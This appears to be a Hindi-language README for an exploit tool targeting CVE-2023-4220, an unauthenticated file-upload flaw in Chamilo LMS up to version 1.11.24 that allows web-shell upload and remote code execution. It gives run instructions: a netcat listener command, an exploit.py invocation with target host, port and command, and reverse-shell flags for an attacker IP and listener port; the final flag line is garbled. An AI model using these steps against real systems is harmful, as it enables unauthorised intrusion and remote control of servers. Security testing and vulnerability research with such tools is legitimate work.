CVE-2023-4220-RCE
सारांश
Starlabs सलाह
- प्रभावित उत्पाद: Chamilo <= v1.11.24
- विवरण: Chamilo LMS <= v1.11.24 में /main/inc/lib/javascript/bigupload/inc/bigUpload.php पर बड़ी फ़ाइल अपलोड कार्यक्षमता में अनियंत्रित फ़ाइल अपलोड, अप्रमाणित हमलावरों को संग्रहीत क्रॉस-साइट स्क्रिप्टिंग हमले करने और वेब शेल अपलोड करके दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है।
- CVSS स्कोर: 8.1 (उच्च)
उपयोग
- नेटकैट लिसनर सेट करें (यदि आप रिवर्स शेल चाहते हैं)
sudo nc -lnvp 443
- एक्सप्लॉइट चलाएँ
python3 exploit.py -u --url <REMOTE HOST>, -p --port [REMOTE PORT] -c --comand <COMMAND>
- रिवर्स शेल के लिए फ़्लैग्स
- -lh/--localhost: हमलावर आईपी
- **-lp/--localtcat लिसनर पोर्ट